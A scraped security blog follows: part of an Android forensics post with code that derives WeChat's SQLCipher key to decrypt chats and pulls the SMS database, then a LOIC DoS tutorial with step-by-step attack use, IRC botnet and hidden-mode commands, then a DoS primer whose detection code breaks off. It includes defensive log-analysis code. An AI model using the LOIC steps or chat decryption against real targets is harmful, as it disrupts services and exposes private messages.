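"""


def extract_uin(prefs_xml: str, key_name: str = "default_uin") -> str:
    """Return the UIN as the decimal string WeChat stores (it may be negative)."""
    root = ET.fromstring(prefs_xml)
    for elem in root.iter("int"):
        if elem.get("name") == key_name:
            return elem.get("value")
    raise KeyError(f"{key_name} not found in preferences")


def derive_key(imei: str, uin: str, lowercase: bool = True) -> str:
    """Key = first 7 hex characters of MD5(IMEI || UIN), no separator.

    SQLCipher runs the passphrase bytes through PBKDF2, so the case of the
    hex digits matters; lowercase is tried first, uppercase is the fallback.
    """
    digest = hashlib.md5((imei + uin).encode("ascii")).hexdigest()
    key = digest[:7]
    return key if lowercase else key.upper()


def sqlcipher_open_statements(key: str) -> list:
    """PRAGMAs in the order SQLCipher requires: key first, then cipher settings."""
    return [
        f"PRAGMA key = '{key}';",
        "PRAGMA cipher_use_hmac = OFF;",
        "PRAGMA cipher_page_size = 1024;",
        "PRAGMA kdf_iter = 4000;",
    ]


def sqlcipher_shell_script(key: str, out_path: str = "EnMicroMsg_plain.db") -> str:
    """Script for the sqlcipher command-line shell: decrypt to a plain SQLite file.

    ATTACH with an empty key plus sqlcipher_export() writes an unencrypted
    copy that any SQLite viewer can open.
    """
    lines = sqlcipher_open_statements(key) + [
        f"ATTACH DATABASE '{out_path}' AS plaintext KEY '';",
        "SELECT sqlcipher_export('plaintext');",
        "DETACH DATABASE plaintext;",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # usage: python wechat_key.py <IMEI> <system_config_prfs.xml>
    imei = sys.argv[1] if len(sys.argv) > 1 else "123456789012345"  # placeholder IMEI
    xml_text = open(sys.argv[2]).read() if len(sys.argv) > 2 else SAMPLE_PREFS_XML
    key = derive_key(imei, extract_uin(xml_text))
    print("pragma key:", key)
    print(sqlcipher_shell_script(key), end="")
```

Feed the printed script to the sqlcipher shell with `sqlcipher EnMicroMsg.db < script.sql` and work on the exported plain copy. The three cipher PRAGMAs describe a SQLCipher 1.x-format file; on a SQLCipher 4 build, which also changed the KDF hash to SHA-512, add `PRAGMA cipher_kdf_algorithm = PBKDF2_HMAC_SHA1;` after the key (or use `PRAGMA cipher_compatibility = 1;`, which sets all the legacy values at once), or the database will still report as “not a database” even with the right key.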
<span style="background-color: white;"><strong>SMS Analysis<br />
</strong></span><br />
<span style="background-color: white;">SMS and MMS are stored in the same database on Android.<br />
</span><br />
Text messages live in an SQLite database named mmssms.db, typically found at<br />
<strong>/data/data/com.android.providers.telephony/databases/mmssms.db</strong><br />
<span style="background-color: white;"><strong>Step 1: </strong>Find<strong><br />
</strong>SMS database file location in connected device/emulator<strong><br />
</strong></span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn49.png" /><span style="background-color: white;"><strong><br />
</strong></span></div>
<span style="background-color: white;">The <strong>telephony.db</strong> database in the same directory is small but contains one potentially useful source of information.<br />
</span><br />
Its <strong>siminfo</strong> table holds historical data for every SIM that
has been used in the device, including the ICCID, the phone number (if it
was stored on the SIM), and the mobile country code (MCC) / mobile
network code (MNC).<span style="background-color: white;"><br />
</span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn50.png" /><span style="background-color: white;"><strong><br />
</strong></span></div>
<span style="background-color: white;"><strong>Step 2: </strong>Pull the SQLite database file with ADB<br />
</span><br />
<span style="background-color: white;">The following command copies the database to the workstation (the directory is readable only by root, so this needs a rooted device or an emulator, or an adb daemon running as root) –<br />
</span><br />
<span style="background-color: white;"><strong>adb pull /data/data/com.android.providers.telephony/databases/mmssms.db mmssms.db</strong><br />
</span><br />
<span style="background-color: white;">With this step the </span>whole SMS database is copied into your working directory. Pull the -journal or -wal file alongside it if one exists, since recent changes may still be sitting there rather than in the main file.<br />
<span style="background-color: white;"><strong>Step 3:<br />
</strong></span><br />
With a copy of the SMS database in hand, inspect it for message fragments
with a hex viewer, or with an SQLite viewer such as the Oxygen Forensic
SQLite Viewer, which can also surface records deleted from the tables but
still present in the file’s free pages. The viewer below shows the allocated blocks of SMS data:<span style="background-color: white;"><br />
</span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn51.png" /><span style="background-color: white;"><br />
</span></div>
<strong>Step 4</strong>:<br />
<strong>mmssms.db</strong> holds everything about SMS and MMS messages. The tables of interest are:<br />
<strong>part: </strong>Information about the files attached
to an MMS. Each message has at least two parts: an SMIL header
and the attachment itself. The mid column ties a part to its message and
the ct column gives the content type of the attachment. The _data column
is the path of the attachment file on the device.<br />
<strong>pdu</strong>: Metadata about each MMS. The _id column
identifies the message, the date column records when it was sent or
received as a Unix epoch timestamp (in seconds), and the msg_box column
gives the direction: 1 for received and 2 for sent.<br />
<strong>sms</strong>: One row per text message. The address column
holds the phone number of the remote user, regardless of whether the
message was sent or received. The date column is the timestamp, in
milliseconds since the Unix epoch (not seconds, as in pdu). The type
column shows the direction: 1 for received and 2 for sent. The body
column holds the text of the message. The read and seen columns are
flags (0 for unread, 1 for read); they are only meaningful for received
messages, since the provider sets them itself for outgoing ones.<br />
<strong>words, words_content, words_segdir<br />
</strong><br />
words is an SQLite full-text search (FTS) virtual table that indexes
message text for the Messaging app’s search feature; words_content and
words_segdir are its internal shadow tables. The text they contain
duplicates the body column rather than holding anything new.<br />
<strong>Sample schema for SMS<br />
</strong><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/072117_1317_PracticalAn52.png" /><span style="background-color: white;"><br />
</span></div>
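Reading the pulled database in code, as an added example that is not from the original article. It builds a small mmssms.db in memory containing a constructed subset of the real sms, pdu and part tables (only the columns discussed above, not the full schema and not real data), then extracts the messages with direction, timestamps and attachments decoded. The direction maps go beyond the two values the text names and cover the other box types Android uses; open_db() opens a real pulled file read-only instead of the sample.<br />

```python
"""Decode SMS and MMS records from a pulled mmssms.db.

Added example, not code from the article. It creates a small mmssms.db
in memory containing a constructed subset of the real sms, pdu and part
tables, then extracts the messages with direction, timestamps and
attachments decoded. The direction maps go beyond the two values the
text names, covering the other box types Android uses. open_db() opens a
real pulled file read-only instead.
"""
import sqlite3
from datetime import datetime, timezone

# sms.type values (Telephony.Sms.MESSAGE_TYPE_*)
SMS_TYPE = {1: "inbox", 2: "sent", 3: "draft", 4: "outbox", 5: "failed", 6: "queued"}
# pdu.msg_box values (Telephony.Mms.MESSAGE_BOX_*)
MMS_BOX = {1: "inbox", 2: "sent", 3: "draft", 4: "outbox"}


def open_db(path: str) -> sqlite3.Connection:
    """Open a pulled database read-only so the working copy is not altered."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample database: only the columns used below, not the full schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE sms (_id INTEGER PRIMARY KEY, thread_id INTEGER, address TEXT,
                          date INTEGER, type INTEGER, body TEXT, read INTEGER, seen INTEGER);
        CREATE TABLE pdu (_id INTEGER PRIMARY KEY, thread_id INTEGER, date INTEGER,
                          msg_box INTEGER);
        CREATE TABLE part (_id INTEGER PRIMARY KEY, mid INTEGER, ct TEXT, _data TEXT, text TEXT);
    """)
    # sms.date is milliseconds since the Unix epoch
    conn.executemany("INSERT INTO sms VALUES (?,?,?,?,?,?,?,?)", [
        (1, 1, "+15555550100", 1500000000000, 1, "meet at 6?", 1, 1),
        (2, 1, "+15555550100", 1500000060000, 2, "ok, see you there", 1, 1),
        (3, 2, "+15555550199", 1500003600000, 1, "your code is 4821", 0, 0),
    ])
    # pdu.date is SECONDS since the epoch, unlike sms.date
    conn.execute("INSERT INTO pdu VALUES (?,?,?,?)", (10, 1, 1500000120, 2))
    conn.executemany("INSERT INTO part VALUES (?,?,?,?,?)", [
        (1, 10, "application/smil", None, "<smil><body/></smil>"),
        (2, 10, "image/jpeg",
         "/data/data/com.android.providers.telephony/app_parts/PART_1500000120", None),
    ])
    conn.commit()
    return conn


def utc(ms: int) -> str:
    """Render an epoch timestamp in milliseconds as UTC; convert to local time only when reporting."""
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def sms_messages(conn) -> list:
    """All text messages, oldest first, with type decoded to a direction."""
    rows = conn.execute(
        "SELECT _id, address, date, type, body, read FROM sms ORDER BY date").fetchall()
    return [{"id": i, "address": addr, "time_utc": utc(ms),
             "direction": SMS_TYPE.get(t, f"unknown({t})"),
             "body": body, "read": bool(read)} for i, addr, ms, t, body, read in rows]


def mms_messages(conn) -> list:
    """Each MMS with its non-SMIL attachments (the SMIL part is only layout)."""
    out = []
    for mid, secs, box in conn.execute("SELECT _id, date, msg_box FROM pdu ORDER BY date"):
        parts = conn.execute(
            "SELECT ct, _data FROM part WHERE mid = ? AND ct != 'application/smil'",
            (mid,)).fetchall()
        out.append({"id": mid, "time_utc": utc(secs * 1000),
                    "direction": MMS_BOX.get(box, f"unknown({box})"),
                    "attachments": [{"content_type": ct, "path": path} for ct, path in parts]})
    return out


def unread_received(conn) -> list:
    """Triage query: received texts the user never opened."""
    return [body for (body,) in conn.execute(
        "SELECT body FROM sms WHERE type = 1 AND read = 0 ORDER BY date")]


if __name__ == "__main__":
    import sys
    db = open_db(sys.argv[1]) if len(sys.argv) > 1 else build_sample_db()
    for m in sms_messages(db):
        print(f"{m['time_utc']} {m['direction']:>6} {m['address']}: {m['body']}")
    for m in mms_messages(db):
        print(f"{m['time_utc']} {m['direction']:>6} MMS attachments: {m['attachments']}")
```

The two timestamp units are the usual trap here: treating pdu.date as milliseconds puts every MMS in January 1970, and treating sms.date as seconds puts every text tens of thousands of years in the future. Keeping everything in UTC until the report is written avoids a second trap, the phone’s time zone differing from the examiner’s.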
<h1>
<span style="background-color: white;">Conclusion<br />
</span></h1>
<span style="background-color: white;">The </span>forensic<span style="background-color: white;">
analysis of Android phones and Android applications involves different
techniques from traditional forensics, and each new Android version or
security upgrade forces new methods to be researched. Beyond the
challenges of extracting data, bypassing screen locks and passwords,
and recovering deleted data, maintaining the integrity of the device and
application data is the biggest challenge in any Android forensic
examination. Many tools exist, but there are still gaps to fill, and a lot
remains to be done in this area.<br />
</span><br />
<span id="tve_leads_end_content" style="border: 1px solid transparent; display: block; visibility: hidden;"></span></div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-46897533007901865462016-12-14T00:44:00.000+05:302016-12-14T00:44:16.985+05:30LOIC (Low Orbit Ion Cannon) – DOS attacking tool<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
A DoS (Denial of Service) attack is
one of the more powerful hacks, capable of taking a server completely
down, so that it can no longer handle requests from legitimate users. In
a distributed DoS, many computers connected to the
internet flood the server with bogus requests at the same time, leading to a
service disruption. An attacker has many ways to mount this attack
against a server over a network or the internet; some
write their own tools, while others use tools that are already available.</div>
<div style="text-align: justify;">
LOIC (Low Orbit Ion Cannon) is one of
the most powerful DoS attack tools freely available. If you follow
news related to hacking and security issues, you have doubtless been
hearing about this tool for the past several months. It has become
widely used, including in some highly publicized attacks against
PayPal, Mastercard and Visa servers a few months back. This tool was
also the weapon of choice of the (in)famous hacker group
Anonymous, who have claimed responsibility for many high-profile
attacks, among them those against Sony, the FBI and other US security
agencies. The group not only used this tool but also asked
others to download it and join Anonymous attacks coordinated over IRC.</div>
<div style="text-align: justify;">
In this brief article, I will give an
overview and operational model of the tool. There are 2 versions of the
tool: the first is the binary version, which is the original LOIC tool.
The other is web-based LOIC or JS LOIC.</div>
<div style="text-align: justify;">
<img alt="" class="alignnone" height="299" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122011_2124_LOICLowOrbi1.jpg" width="569" /></div>
<div style="text-align: justify;">
Figure 1: Original LOIC</div>
<div style="text-align: justify;">
<strong>About The Original LOIC Tool:<br />
</strong></div>
<div style="text-align: justify;">
LOIC was originally developed by
Praetox Technologies as a stress-testing application before being
released into the public domain. The tool performs a simple
DoS attack by sending a large stream of UDP, TCP or HTTP requests to
the target server. It is very easy to use, even for someone without
any basic knowledge of hacking: all a user needs to know is the URL of
the target. A would-be attacker need only
select a few options (the address of the target and the method of
attack) and click a button to start the attack.</div>
<div style="text-align: justify;">
The tool takes the URL of the target
server you want to attack, or its IP address; the IP
address is useful on an internal network where no DNS name resolves to the
target. The tool has three main attack methods, TCP, UDP and HTTP, and you
select one of them. Other options include the timeout, the TCP/UDP message
string, the port and the number of threads. See the basic screen
of the tool in the snapshot above in Figure 1.</div>
<div style="text-align: justify;">
The LOIC version used in the Anonymous
attacks was different from the original LOIC: it had an option to
connect the client to an IRC (Internet Relay Chat) server, which allowed the
tool to be controlled remotely over the IRC protocol. In that case
the user’s machine became part of a botnet. A botnet is a set of
compromised computers connected to each other over the internet
and controlled by an attacker who points them
at his or her target. The bigger the botnet, the more powerful the
attack.</div>
<div style="text-align: justify;">
<img alt="" height="361" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122011_2124_LOICLowOrbi2.jpg" width="702" /></div>
<div style="text-align: justify;">
Figure 2: Modified version of LOIC with an option for IRC connect</div>
<div style="text-align: justify;">
<strong>Type of attacks: </strong>As
mentioned previously, LOIC has three attack modes
(TCP, UDP and HTTP). All three use the same mechanism: the tool opens
multiple connections to the target server and
sends a continuous stream of messages, whose content is set with the
TCP/UDP message option in the tool. In the TCP and
UDP modes the string is sent as raw payload; in the HTTP mode
it is embedded in the HTTP GET requests.</div>
<div style="text-align: justify;">
This tool continues sending requests to
the target server; after some time, the target server becomes
overloaded. In this way, the target server will no longer be able to
respond to requests from legitimate users, effectively shutting it down.</div>
<div style="text-align: justify;">
<strong>Analysis of the attack:<br />
</strong></div>
<div style="text-align: justify;">
<strong>UDP Attack: </strong>To perform
a UDP attack, select UDP as the method. Port 80 is
selected by default, but you can change it as
needed. Change the message string or leave it at the default.</div>
<div style="text-align: justify;">
<strong>TCP Attack: </strong>This method is similar to the UDP attack. Select TCP as the type of attack to use it.</div>
<div style="text-align: justify;">
<strong>HTTP Attack: </strong>In this
mode the tool sends HTTP GET requests to the target server. Because the
requests are complete, well-formed HTTP arriving from a single address, a web
application firewall or rate limiter can detect and block this mode easily.</div>
<div style="text-align: justify;">
<strong>How to use LOIC to perform a DoS attack: </strong>Just follow these simple steps to mount a DoS attack against a website (but do so at your own risk).</div>
<ul>
<li><span style="text-align: justify;"><strong>Step 1: </strong> Run the tool.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Step 2: </strong>Enter
the URL of the website in the URL field and click on “Lock on”. Then
select the attack method (TCP, UDP or HTTP); I recommend TCP to start.
These two settings are all that is needed to start the attack.<br />
</span></li>
</ul>
<div style="text-align: justify;">
<img alt="" class="alignnone" height="369" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122011_2124_LOICLowOrbi3.jpg" width="702" /></div>
<div style="text-align: justify;">
Figure3: LOIC in action (I painted the URL and IP white to hide the identity of the victim in snap)</div>
<ul>
<li><span style="text-align: justify;"><strong>Step 3: </strong>Change
the other parameters as you like or leave them at their defaults. Now click
the big button labelled “IMMA CHARGIN MAH LAZER.” You have just
launched an attack on the target.<br />
</span></li>
</ul>
<div style="text-align: justify;">
After starting the attack you will see
counters in the Attack status fields. When the Requested counter
stops increasing, restart LOIC or change the IP. You can also give
the UDP attack a try. The speed of the attack is set with a
slider. It is at “faster” by default but you can slow it down with the
slider; I don’t think anyone is going to slow down the attack.</div>
<div style="text-align: justify;">
Here’s the meaning of each field:</div>
<ul>
<li><span style="text-align: justify;"><strong>IDLE: </strong>The number of idle threads. It should be zero for the attack to be fully efficient.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Connecting:</strong> The number of threads that are trying to connect to the victim server.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Requesting: </strong>The number of threads that are requesting data from the victim server.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Downloading: </strong>The number of threads that are downloading a response from the server.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Downloaded: </strong>How many times a download from the victim server has been started.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Requested: </strong>How many times data has been requested from the victim server.<br />
</span></li>
<li><span style="text-align: justify;"><strong>Failed: </strong>How
many times the server did not respond to a request. A
growing number in this field means the server is going down, so the success
of the attack is measured by it.<br />
</span></li>
</ul>
<div style="text-align: justify;">
<strong>LOIC in HIVEMIND: </strong>The
Windows version of LOIC has a feature called HIVEMIND. With it, users
connect their client to an IRC server so that it can be
controlled remotely, which makes some risky attacks possible, so use it
wisely. Connecting to the IRC server does not give anyone remote
administration of your machine or expose your system in other ways: it
only controls your LOIC client, although whoever runs the channel then
chooses what your client attacks. This method was used to gather more
people for the DDoS attack against Visa, Mastercard and other financial
organisations that had cut off Wikileaks (the attack was called
“Operation Payback”).</div>
<div style="text-align: justify;">
In this mode thousands of systems
attack a single website at once, which is what makes a real impact. The
more people who joined the attack via IRC, the more powerful it became.</div>
<div style="text-align: justify;">
To start LOIC in HIVEMIND mode, run this command in the command prompt:</div>
<code>LOIC.exe /hivemind irc.server.address </code><br />
<div style="text-align: justify;">
After running the above command, your LOIC client will connect to <strong>irc://irc.server.adress:6667/loic<br />
</strong></div>
<div style="text-align: justify;">
You can also set more parameters in the command to use the tool in better way. Use port and channel too with the command.</div>
<code>LOIC.exe /hivemind irc.server.address 1234 #secret </code><br />
<div style="text-align: justify;">
It will connect to irc://irc.server.adress:1234/secret</div>
<div style="text-align: justify;">
<strong>HIDDEN MODE: </strong>You can
also run LOIC in hidden mode while using HIVEMIND. In
hidden mode LOIC runs without any visible GUI on your Windows
system. Just add <strong>/hidden</strong> to the command.</div>
<code>LOIC.exe /hidden /hivemind irc.server.address </code><br />
<div style="text-align: justify;">
It will connect LOIC client to irc://irc.server.adress:6667/loic without any visible GUI on windows.</div>
<div style="text-align: justify;">
<strong>Web-based LOIC (JS LOIC):</strong> This version of LOIC was released on 9<sup>th</sup>
December 2010. It runs in any JavaScript-enabled
web browser (JS stands for JavaScript). JS LOIC
sends an ID and a message over a large number of connections. It is
easier to use than the desktop version: just open the
web page, a single HTML file, and start the attack. Its attack power is
about the same as the desktop version’s, bounded by how many connections
the browser will open.</div>
<div style="text-align: justify;">
<strong>Drawbacks of using LOIC: </strong>The
main drawback of LOIC as a DoS tool is that it is very easy to
find the attacker. The tool takes no precautions to hide the IP
address of the origin of the attack: its TCP and HTTP modes complete a
normal connection to the victim, so every request arrives from, and is
logged against, the attacker’s real address, and the UDP mode sends from
that address as well. Proxies do not solve this. The TCP and UDP floods
are not HTTP and cannot be sent through an HTTP proxy at all; they would
hit the proxy, not the target. Only the HTTP mode can be relayed through
a proxy, and then the proxy records your address and its own capacity
becomes the bottleneck, so the attack is only as strong as the proxy.
Some analysts argue that a sufficiently robust proxy will forward all
the request packets to the target in the end, but that only moves the
evidence into the proxy’s logs.</div>
<div style="text-align: justify;">
<strong>How to prevent the attack of LOIC: </strong>LOIC
is free to download and use, and can be used effectively
with very little hacking experience. Anyone who wants to can attack a
website with it.</div>
<div style="text-align: justify;">
As discussed above, the tool’s traffic is simple and easy to identify:
a small number of addresses each sending far more requests than any real
client. A well-configured firewall is
enough to keep the attack from being fully effective, and a server
administrator can read the request logs to identify the offending IPs
and block them at the firewall. Every website owner or server
administrator should monitor the traffic and activity on the
server; that alone goes a long way against this attack. It will not
help much when a large network of LOIC clients fires on the server
all at once, since the addresses are then too many to block by hand;
per-source rate limiting, and filtering of the LOIC packets upstream of
the server, is the best protection for that case.</div>
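The log review described above, as an added example that is not code from the original article: a small Python script that reads a web server access log in the Apache/nginx combined format, finds addresses whose request rate in a short sliding window is far beyond what a browser produces (LOIC does not spoof its source address, so its HTTP mode shows up exactly like this), and emits one block rule per offender. The log lines are constructed here; the window, the threshold and the iptables rule are placeholders to tune and review per site, not a complete mitigation.<br />

```python
"""Flag LOIC-style floods in a web server access log and emit block rules.

Added example, not code from the article. LOIC does not spoof its source
address, so its traffic shows up as a single address issuing far more
requests in a short window than any real browser. The log lines are
constructed here in the Apache/nginx combined format; the window and
threshold are placeholders to be tuned per site, and the iptables rule
is one possible response, not a complete mitigation.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse(lines):
    """Yield (ip, timestamp, request line) for every line that matches the format."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.group("ip"), datetime.strptime(m.group("ts"), TS_FORMAT), m.group("req")


def flood_sources(lines, window_seconds: int = 10, threshold: int = 50) -> dict:
    """Return {ip: peak requests seen in any window_seconds span} for addresses
    whose peak reaches threshold. Sliding window over each address's sorted
    timestamps; the window is inclusive at both ends, [t - w, t]."""
    per_ip = defaultdict(list)
    for ip, ts, _ in parse(lines):
        per_ip[ip].append(ts.timestamp())
    offenders = {}
    for ip, times in per_ip.items():
        times.sort()
        peak, oldest = 0, 0
        for newest, t in enumerate(times):
            while times[oldest] < t - window_seconds:   # drop entries older than the window
                oldest += 1
            peak = max(peak, newest - oldest + 1)
        if peak >= threshold:
            offenders[ip] = peak
    return offenders


def block_rules(offenders: dict) -> list:
    """One iptables rule per offending address (review before applying)."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(offenders)]


def _line(ip, when, req, status, size):
    return f'{ip} - - [{when.strftime(TS_FORMAT)}] "{req}" {status} {size}'


def make_sample_log() -> list:
    """Constructed log: one ordinary visitor and one LOIC HTTP-mode client."""
    base = datetime(2017, 7, 21, 13, 17, 0, tzinfo=timezone.utc)
    lines = [_line("203.0.113.5", base + timedelta(seconds=12 * i),
                   "GET /index.html HTTP/1.1", 200, 5120) for i in range(5)]
    # 30 requests per second for 4 seconds from a single address
    lines += [_line("198.51.100.77", base + timedelta(seconds=i // 30),
                    "GET / HTTP/1.1", 200, 512) for i in range(120)]
    return lines


if __name__ == "__main__":
    import sys
    log = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else make_sample_log()
    hits = flood_sources(log)
    for ip, peak in hits.items():
        print(f"{ip}: peak {peak} requests in 10 s")
    print("\n".join(block_rules(hits)))
```

Run it as `python loic_check.py /var/log/nginx/access.log` and review the rules before applying them; a shared NAT address or a search engine crawler can also exceed a naive threshold, which is why the rule list is printed rather than executed. For the HIVEMIND case, where hundreds of addresses each stay under the threshold, per-address counting is the wrong tool, and the rate limiting has to move to the firewall or upstream.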
<div style="text-align: justify;">
<strong>Conclusion: </strong>In the past few
months this tool has been downloaded millions of times and used against
some big websites, such as Mastercard, Visa and PayPal, in support of
Wikileaks. The group known as Anonymous used it to attack those
websites. With so many people joining the attack through the IRC
network, nobody could say who the organisers behind the group were, but
the individual machines taking part were fully traceable.</div>
<div style="text-align: justify;">
Using this tool is like sending someone
a threatening letter with your address and phone number on it: you will be
easily caught. Legality varies by country, and even where a DoS attack
is not itself illegal, the tool will not achieve much if you use it from
your system alone; you need a network of
systems to join the attack. The tool is easy to use and gives a clear
demonstration of a DoS attack, but try it at your own risk.</div>
<div style="text-align: justify;">
The tool is freely available on the
internet, so anyone can download it and cause problems for a
website. Catching the attacker is easy, and protection against such
an attack is relatively easy to achieve as well. I suggest every company and
server administrator make sure their firewall is configured to
filter the traffic generated by LOIC.</div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-78091237833497083362016-12-14T00:26:00.000+05:302016-12-14T00:26:03.157+05:30Introduction to Denial-of-Service Attack<div dir="ltr" style="text-align: left;" trbidi="on">
In this post we examine the DoS (Denial of Service) attack: how it
works, what its impact is, and some tools for performing
this kind of attack through different vectors.<br />
The DoS attack is one of the most destructive attacks on the web. It <span style="color: black;">attempts to exhaust the resources of the victim and </span>take down the victim’s server(s). But first, <span style="text-decoration: underline;"><strong>what is a DoS attack?</strong></span><br />
A DoS attack, for <span style="text-decoration: underline;"><strong>D</strong></span>enial <span style="text-decoration: underline;"><strong>of</strong></span><br />
<span style="text-decoration: underline;"><strong>S</strong></span>ervice, often euphemistically advertised as a <span style="text-decoration: underline;"><strong>stress test</strong></span>,
consists of flooding a target with a large quantity of requests that
slows its traffic or prevents it from responding to legitimate
requests.<br />
You can visualize the daily DDoS attacks worldwide in real time to see the severity of this kind of attack on <a href="http://www.digitalattackmap.com/"><span style="color: #0563c1; text-decoration: underline;">http://www.digitalattackmap.com/</span></a><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer1.png" /></div>
<div style="text-align: center;">
<strong>Figure 1 Digital Map of DDos Attacks</strong></div>
It is important to understand the difference between DoS and DDoS. A
single attacker performs the DoS. Here’s an example of a simple DoS
Attack:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer2.png" /></div>
<div style="text-align: center;">
<strong>Figure 2 Simple DoS Attack</strong></div>
A DDoS attack, for Distributed Denial of Service, is a DoS
attack performed by a group of machines controlled by the attacker.
The attacker’s machine is called the <strong>Master</strong>, and the controlled machines are called <span style="text-decoration: underline;"><strong>zombies</strong></span> or bots; together they form a <span style="text-decoration: underline;"><strong>botnet</strong></span>.<br />
Here’s an example of a simple DDoS Attack:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer3.png" /></div>
<div style="text-align: center;">
<strong>Figure 3 DDoS Attack</strong></div>
A DoS attack can be carried out through different vectors (this is not an exhaustive list):<br />
<ul>
<li><span style="text-decoration: underline;"><strong>Application Layer Attack</strong></span>: This attack targets layer 7, and it can be run as either DoS or DDoS.</li>
</ul>
The idea is to send a high number of requests that look like normal
application traffic, so that the application itself, rather than the
network, runs out of capacity. Examples of this kind
of DoS: HTTP flooding, DNS query flooding (DNSQF).<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer4.png" /></div>
<div style="text-align: center;">
<strong>Figure 4 Example of HTTP Flooding attack</strong></div>
<ul>
<li><strong>Network Layer Attack</strong>: These attacks target layers 3 and 4
(network and transport). The common case is a DDoS that abuses protocol
behaviour, such as a SYN flood (filling the target's table of half-open
connections) or DNS amplification (small queries with a spoofed source that
open resolvers answer with much larger replies sent to the victim), and they
can cause several kinds of damage, from exhausted connection tables to saturated links.</li>
</ul>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120716_1111_DenialofSer5.png" /></div>
<div style="text-align: center;">
<strong>Figure 5 Network Layer Attack</strong></div>
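As an added example (not from the original post), here is how a defender would recognise a SYN flood from a packet summary rather than from the attacker's side. The log format, addresses and flag values are constructed for the demo; the code keeps a table of half-open handshakes, the same table the victim's kernel fills up during a SYN flood, and counts it by client and by target port:<br />

```python
# Added example, not part of the original post: spot a SYN flood in a packet
# summary log. The log format and every address in SAMPLE_LOG are constructed
# for this demo; flags are the TCP flag byte in hex (02 = SYN, 12 = SYN+ACK,
# 10 = ACK, 04 = RST, 14 = RST+ACK).
from collections import Counter

SYN, RST, ACK = 0x02, 0x04, 0x10

# Constructed log: "time src sport dst dport flags"
SAMPLE_LOG = """\
1.00 10.0.0.5 40001 192.0.2.10 80 02
1.01 192.0.2.10 80 10.0.0.5 40001 12
1.02 10.0.0.5 40001 192.0.2.10 80 10
1.10 10.0.0.5 40002 192.0.2.10 80 02
1.11 192.0.2.10 80 10.0.0.5 40002 12
1.12 10.0.0.5 40002 192.0.2.10 80 10
2.00 203.0.113.7 1001 192.0.2.10 80 02
2.00 203.0.113.7 1002 192.0.2.10 80 02
2.00 203.0.113.7 1003 192.0.2.10 80 02
2.01 203.0.113.7 1004 192.0.2.10 80 02
2.01 203.0.113.7 1005 192.0.2.10 80 02
3.00 198.51.100.1 5000 192.0.2.10 443 02
3.00 198.51.100.2 5000 192.0.2.10 443 02
3.00 198.51.100.3 5000 192.0.2.10 443 02
3.00 198.51.100.4 5000 192.0.2.10 443 02
3.00 198.51.100.5 5000 192.0.2.10 443 02
3.00 198.51.100.6 5000 192.0.2.10 443 02
"""

def parse_line(line):
    ts, src, sport, dst, dport, flags = line.split()
    return float(ts), src, int(sport), dst, int(dport), int(flags, 16)

def track_handshakes(lines):
    """Replay the log and return the handshakes still half-open at the end,
    keyed by (client, client_port, server, server_port) with the SYN time."""
    pending = {}
    for line in lines:
        if not line.strip():
            continue
        ts, src, sport, dst, dport, flags = parse_line(line)
        if flags & SYN and not flags & ACK:       # client SYN opens a half-open entry
            pending[(src, sport, dst, dport)] = ts
        elif flags & SYN:                         # server SYN+ACK: still half-open
            continue
        elif flags & RST:                         # either side aborts it
            pending.pop((src, sport, dst, dport), None)
            pending.pop((dst, dport, src, sport), None)
        elif flags & ACK:                         # client ACK completes it
            pending.pop((src, sport, dst, dport), None)
    return pending

def suspicious_sources(pending, threshold):
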